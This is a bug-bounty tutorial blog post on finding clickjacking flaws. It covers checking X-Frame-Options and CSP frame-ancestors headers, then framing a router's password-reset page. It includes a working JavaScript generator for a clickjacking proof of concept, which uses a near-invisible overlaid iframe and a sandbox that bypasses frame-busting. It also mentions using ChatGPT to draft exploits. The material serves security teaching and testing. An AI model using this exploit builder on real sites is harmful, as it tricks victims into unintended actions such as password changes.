This is the easiest bug you can find.


Imad Husanovic

In case you are new here: I am Deadoverflow, a cyber security researcher, and I do my best to give people free content and help them find their first bug, or just get started with hacking, for free!

You can subscribe to my YouTube channel, on which I will be uploading educational content. I have well over 2 years of experience in bug hunting and close to 50 bugs found in those 2 years.

Youtube: https://youtu.be/tqSK50xo9yE?si=JKlQ0onnSnUO0ZPF

In case you want to support me even more, here is my patreon.

Patreon: https://www.patreon.com/Deadoverflow

With all of that said, this is the easiest bug ever to hunt for!

Clickjacking — (UI Redressing)

Clickjacking is a type of vulnerability that is really easy to hunt for. I would argue that it is the easiest vulnerability to find, but among the harder ones when it comes to developing an exploit.

Usually I use an AI like ChatGPT to draft the exploit, since that is the easiest way; I only need to patch a few things here and there in the code and it is good to go. Note that you need to know basic HTML and CSS as well as some basic JavaScript.

With that said, let’s just start!

Every HTTP request carries headers that tell the web server what is being requested and by what kind of client. For example, when you visit https://example.com your browser sends a request whose headers include Host, User-Agent and Accept.

Once the server returns a response, that response carries its own headers, such as Content-Type and, on sites that care about framing, X-Frame-Options.

If you are not familiar with request and response HTTP headers, I recommend you check out this and then come back here: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers

We are going to be talking mostly about the X-Frame-Options response header, since it is the key factor in identifying this vulnerability (together with the frame-ancestors directive of Content-Security-Policy, which does the same job and takes precedence when both are present).

X-Frame-Options is a security header that tells the browser whether other websites may put the page in an iframe. Its two values are DENY (never allow framing) and SAMEORIGIN (allow framing only by pages from the same origin). For example, if you navigate to Instagram.com you can see that the response carries X-Frame-Options: DENY, meaning the browser will refuse to render instagram.com when it is embedded in an iframe on another site.

Now that you know what is this header, let’s start researching!

Once you get your target website ready, you want to open chrome developer tools and navigate to the Network tab.

Then select the Doc filter instead of All, so that only document (HTML) requests are shown.

Now let’s refresh the target webpage.

You can see that there is an example.com HTTP request being captured so let’s expand it and see if there is X-Frame-Options header present.

As you can see in the image, there is no X-Frame-Options header present. Check for a Content-Security-Policy header with a frame-ancestors directive as well, because it blocks framing just like X-Frame-Options does; if neither is there, we can put example.com into an iframe.
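The header check above, done by hand in the DevTools Network tab, can be expressed as a small function. This is an added example, not code from the original post; the header sets at the bottom are constructed for the example (the "router" set mimics a device that sends no framing protection at all) and are not captured from any real site. The rules it applies are browser behaviour: a frame-ancestors directive wins over X-Frame-Options, DENY blocks everyone, SAMEORIGIN allows only the page's own origin, and the obsolete ALLOW-FROM (like any unrecognised value) is ignored.

```javascript
// Added example, not code from the original post: decide from response headers
// whether a page at pageUrl could be framed by a page at framerUrl.

function originOf(url) {
  const u = new URL(url);
  return `${u.protocol}//${u.host}`;
}

// Match one frame-ancestors source expression against the framing origin.
function sourceMatches(src, framerOrigin, pageOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "'self'") return framerOrigin === pageOrigin;
  if (s === "*") return true;
  if (/^[a-z][a-z0-9+.-]*:$/.test(s)) return framerOrigin.startsWith(s); // scheme-source, e.g. https:
  // host-source: [scheme://]host[:port], host may begin with "*."
  const m = s.match(/^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^:/]+)(?::(\d+|\*))?$/);
  if (!m) return false;
  const [, scheme, wildcard, host, port] = m;
  const f = new URL(framerOrigin);
  if (scheme && `${scheme}:` !== f.protocol) return false;
  if (wildcard ? !f.hostname.endsWith(`.${host}`) : f.hostname !== host) return false;
  const fPort = f.port || (f.protocol === "https:" ? "443" : "80");
  if (port && port !== "*" && port !== fPort) return false;
  return true;
}

// headers: plain object of response header name -> value (any letter case).
function frameable(headers, pageUrl, framerUrl) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v;
  const pageOrigin = originOf(pageUrl);
  const framerOrigin = originOf(framerUrl);

  // CSP frame-ancestors, when present, is authoritative; X-Frame-Options is then ignored.
  const csp = h["content-security-policy"] || "";
  const directive = csp.split(";").map(d => d.trim()).find(d => /^frame-ancestors(\s|$)/i.test(d));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1);
    const allowed = sources.some(s => sourceMatches(s, framerOrigin, pageOrigin)); // empty list == 'none'
    return { frameable: allowed, reason: `CSP ${directive}` };
  }

  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return { frameable: false, reason: "X-Frame-Options: DENY" };
  if (xfo === "SAMEORIGIN") return { frameable: framerOrigin === pageOrigin, reason: "X-Frame-Options: SAMEORIGIN" };
  if (xfo) return { frameable: true, reason: `X-Frame-Options "${xfo}" is ignored by modern browsers` };
  return { frameable: true, reason: "no X-Frame-Options and no frame-ancestors" };
}

// Constructed header sets for the example (not captured from any real site):
const SAMPLE_HEADERS = {
  denyAll:    { "X-Frame-Options": "DENY" },
  router:     { "Content-Type": "text/html", "Server": "lighttpd" },
  cspWins:    { "X-Frame-Options": "DENY",
                "Content-Security-Policy": "default-src 'self'; frame-ancestors https://*.partner.example" },
  sameOrigin: { "x-frame-options": "sameorigin" },
};
```

To feed it real headers, open the DevTools console on the target's own tab and run `fetch(location.href).then(r => Object.fromEntries(r.headers))`; a same-origin fetch exposes the response headers, so the resulting object can be passed straight to `frameable`. Note that the cspWins set is reported as frameable from evil.partner.example even though X-Frame-Options says DENY, which is exactly the case a hand check of the X-Frame-Options line alone gets wrong.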

So let’s try that out!

I created a new HTML document and wrote this:

This HTML tries to load example.com inside an iframe; now let's see whether the page actually loads.

I will open this test.html document in the browser now.

As you can see, example.com can be loaded from any other domain. But is this a vulnerability?

The answer is no. This is not a vulnerability, because there is no sensitive action on example.com that a click could perform: clickjacking only matters when the framed page lets a logged-in user change something with a click.

Let’s take a look at another target where there is actually sensitive data stored and available.

That target will be my router's web interface again, so let's research.

Once I logged in and connected to the web interface, I immediately noticed that there is no X-Frame-Options header present, so let’s try to put http://192.168.1.1 into an iframe.

This is the HTML behind this test, now let’s open this document in a browser and see what happens.

As you can see, the page loaded successfully inside a completely different web page, meaning this could be a vulnerability; however, we first need to see what our attack surface is.

I explored the web interface a little and found this:

The panel to reset your password is a separate HTML file, and there is no X-Frame-Options header on its response either. Now I will copy this:

and try to put it into an iframe.

Now let's open test.html in the browser and see what happens.

As you can see, this was also loaded successfully, and this is in fact a vulnerability: a page that performs a sensitive action (changing the password) can be framed by any site.

An attacker can now cover the framed page with a decoy and trick the victim into clicking through it, setting a password the attacker has chosen.

The way you trick the victim into doing something unintentionally is by placing the iframe on top of the decoy page and setting its opacity to a very low value, so that the victim sees the decoy but their clicks land on the invisible frame.

As seen in the image above, I set the opacity to 0.3, and this is how it looks:

You can barely see it, and for your exploit you would want to set the opacity to 0.001 so that it appears invisible.

As you can see, the iframe is completely invisible and the victim would not notice that anything malicious is going on. One caveat before you report: the attack only works if the victim's session is sent along with the framed request. Chrome and other Chromium-based browsers treat cookies that lack a SameSite attribute as SameSite=Lax, which keeps them out of cross-site iframes, so a cookie-based login will often show the login page inside the frame instead; confirm that the framed page is actually authenticated in the victim's browser, not just in your own tab.
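The overlay technique above (decoy underneath, near-transparent iframe on top, shifted so the real button sits under the decoy button) can be generated from a handful of measurements. This is an added example and not the test.html from the original post; the target URL, the decoy label and the button coordinates are placeholders you would measure for the real page (the router's password-reset form in the post), and the `sandbox` attribute is an addition that also neutralises JavaScript frame-busting (`top.location = ...`) on targets that rely on it instead of headers, because allow-top-navigation is not granted.

```javascript
// Added example, not the original post's test.html: build a clickjacking
// proof-of-concept page as a string, ready to be saved as test.html.
function buildClickjackingPoc({
  target,                       // URL of the page to frame (placeholder in the usage below)
  decoyLabel,                   // what the victim believes they are clicking
  buttonX, buttonY,             // top-left of the real button inside the framed page, CSS px
  buttonW = 120, buttonH = 36,  // size of the real button
  decoyX = 40, decoyY = 120,    // where the decoy button is drawn on the attacker page
  opacity = 0.001,              // 0.3 while aligning, 0.001 for the real attack
}) {
  // Shift the frame so that (buttonX, buttonY) inside it lands exactly on the decoy.
  const frameLeft = decoyX - buttonX;
  const frameTop = decoyY - buttonY;
  return `<!doctype html>
<html>
<head>
<meta charset="utf-8">
<title>Claim your reward</title>
<style>
  body { margin: 0; font-family: sans-serif; }
  h1 { position: absolute; left: ${decoyX}px; top: 0; }
  /* decoy button: what the victim sees; drawn UNDER the frame (lower z-index) */
  #decoy { position: absolute; left: ${decoyX}px; top: ${decoyY}px;
           width: ${buttonW}px; height: ${buttonH}px; z-index: 1; }
  /* real target: on TOP and nearly transparent, so the click lands on its button */
  #target { position: absolute; left: ${frameLeft}px; top: ${frameTop}px;
            width: 1200px; height: 900px; border: 0; opacity: ${opacity}; z-index: 2; }
</style>
</head>
<body>
  <h1>You have won!</h1>
  <button id="decoy">${decoyLabel}</button>
  <!-- sandbox without allow-top-navigation blocks top.location frame-busting in the framed page -->
  <iframe id="target" src="${target}" sandbox="allow-forms allow-same-origin allow-scripts"></iframe>
</body>
</html>`;
}

// Constructed parameters: the router URL and the button position are placeholders,
// not measurements from the device in the post.
const poc = buildClickjackingPoc({
  target: "http://192.168.1.1/",
  decoyLabel: "Claim prize",
  buttonX: 300, buttonY: 420,
});
```

Save the returned string as test.html and open it in a browser. Start with `opacity: 0.3` so you can see the framed page through the decoy and adjust buttonX/buttonY until the real button lines up, then drop to 0.001 for the final proof of concept; because the iframe has the higher z-index, the decoy never receives the click even though it is what the victim sees.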

I hope this briefly summarizes how Clickjacking or UI Redressing works and I hope you will now change the way you approach a target to find this type of vulnerability.

If you have any questions, you can reach out to me via email ihusanovic3@gmail.com or on Instagram @dead0verflow https://instagram.com/dead0verflow

I will be trying to answer any questions you may have!
